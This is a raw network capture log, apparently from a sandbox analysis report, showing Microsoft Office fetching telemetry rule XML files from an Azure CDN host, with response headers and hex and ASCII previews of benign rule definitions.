                                                                                                                                                                                                                                            2024-11-14 12:02:56 UTC192OUTGET /rules/rule703751v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:56 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:56 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 1437
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:56 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582BE74E69D5"
                                                                                                                                                                                                                                            x-ms-request-id: 0f93162c-401e-008c-25a3-3486c2000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120256Z-r178fb8d765mjvjchC1DFWhkyn00000002dg0000000039d9
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:56 UTC1437INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 37 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4c 69 76 65 50 65 72 73 6f 6e 61 43 61 72 64 55 73 65 72 41 63 74 69 6f 6e 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703751" V="0" DC="SM" EN="Office.Telemetry.Event.Office.LivePersonaCardUserActions.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C=


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                            54192.168.2.44981113.107.246.45443
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-14 12:02:32 UTC192OUTGET /rules/rule120633v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:32 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:32 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 419
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582BB32BB5CB"
                                                                                                                                                                                                                                            x-ms-request-id: d33f60ae-f01e-0085-74ec-2b88ea000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120232Z-16547b76f7f7scqbhC1DFW0m5w0000000kc000000000d92p
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:32 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 53 73 5d 5b 41 61 5d 5b 4d 6d 5d 5b 53 73 5d 5b 55 75 5d 5b 4e 6e 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120633" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <SR T="2" R="([Ss][Aa][Mm][Ss][Uu][Nn][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=
                                                                                                                                                                                                                                            2024-11-14 12:02:56 UTC192OUTGET /rules/rule703700v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:56 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:56 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 1378
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:49 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582BE2BA2692"
                                                                                                                                                                                                                                            x-ms-request-id: 0d907eaf-001e-00a2-7b61-35d4d5000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120256Z-1749fc9bdbdns7kfhC1DFWb6c400000002pg000000001g6y
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:56 UTC1378INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 37 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4c 69 76 65 50 65 72 73 6f 6e 61 43 61 72 64 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4c 69 76 65 50 65 72 73 6f 6e 61 43 61 72 64 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703700" V="0" DC="SM" EN="Office.Telemetry.Event.Office.LivePersonaCard" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenLivePersonaCard" S="Medium" />


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                            55192.168.2.44980813.107.246.45443
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-14 12:02:32 UTC192OUTGET /rules/rule120630v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:32 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:32 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 499
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:45 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582B98CEC9F6"
                                                                                                                                                                                                                                            x-ms-request-id: 57085b9e-f01e-005d-1ca2-3413ba000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120232Z-r178fb8d765d5f82hC1DFWsrm800000002n0000000005rn9
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:32 UTC499INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120630" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />
                                                                                                                                                                                                                                            2024-11-14 12:02:55 UTC192OUTGET /rules/rule703801v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:56 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:55 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 1419
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:28:05 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582BEC5F210E"
                                                                                                                                                                                                                                            x-ms-request-id: 28b1678c-301e-0000-6ba7-34eecc000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120255Z-1749fc9bdbdns7kfhC1DFWb6c400000002mg0000000058u0
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:56 UTC1419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 38 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4c 69 76 65 50 65 72 73 6f 6e 61 50 69 63 6b 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703801" V="0" DC="SM" EN="Office.Telemetry.Event.Office.LivePersonaPicker.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTen


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                            56192.168.2.44981313.107.246.45443
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-14 12:02:33 UTC192OUTGET /rules/rule120635v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:33 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:33 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 420
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582B9DAE3EC0"
                                                                                                                                                                                                                                            x-ms-request-id: 7f617d81-b01e-0021-0b30-36cab7000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120233Z-1749fc9bdbd85qw2hC1DFW157000000002ng000000004bu1
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:33 UTC420INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 54 74 5d 5b 4f 6f 5d 5b 53 73 5d 5b 48 68 5d 5b 49 69 5d 5b 42 62 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120635" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <SR T="2" R="^([Tt][Oo][Ss][Hh][Ii][Bb][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O
                                                                                                                                                                                                                                            2024-11-14 12:02:56 UTC192OUTGET /rules/rule703750v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:56 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:56 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 1400
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:42 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582BDE95A90D"
                                                                                                                                                                                                                                            x-ms-request-id: 9afff7f0-701e-0098-0c61-36395f000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120256Z-r178fb8d765dbpv9hC1DFWma7000000000u0000000007kgt
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:56 UTC1400INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 37 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4c 69 76 65 50 65 72 73 6f 6e 61 43 61 72 64 55 73 65 72 41 63 74 69 6f 6e 73 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4c 69 76 65 50 65 72 73 6f 6e 61 43 61 72 64 55 73 65 72 41
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703750" V="0" DC="SM" EN="Office.Telemetry.Event.Office.LivePersonaCardUserActions" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenLivePersonaCardUserA


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                            57192.168.2.44981413.107.246.45443
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-14 12:02:33 UTC192OUTGET /rules/rule120636v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:33 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:33 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 472
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582B9D43097E"
                                                                                                                                                                                                                                            x-ms-request-id: c6b44c52-001e-0028-1ef0-2cc49f000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120233Z-16547b76f7fm7xw6hC1DFW5px40000000kdg00000000dw4f
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:33 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120636" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />
                                                                                                                                                                                                                                            2024-11-14 12:02:57 UTC192OUTGET /rules/rule701301v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:57 UTC517INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:57 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 1403
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:28:07 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582BEDA52D06"
                                                                                                                                                                                                                                            x-ms-request-id: 524ad425-c01e-007a-1fd2-2cb877000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120257Z-16547b76f7fnlcwwhC1DFWz6gw0000000kp000000000aqap
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:57 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 33 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4c 69 63 65 6e 73 69 6e 67 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701301" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Licensing.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                            58192.168.2.44981513.107.246.45443
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-14 12:02:33 UTC192OUTGET /rules/rule120637v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:33 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:33 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 427
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:12 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582BA909FA21"
                                                                                                                                                                                                                                            x-ms-request-id: ceff4d6f-101e-007a-10c7-2c047e000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120233Z-16547b76f7fj897nhC1DFWdwq40000000kf0000000007db9
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
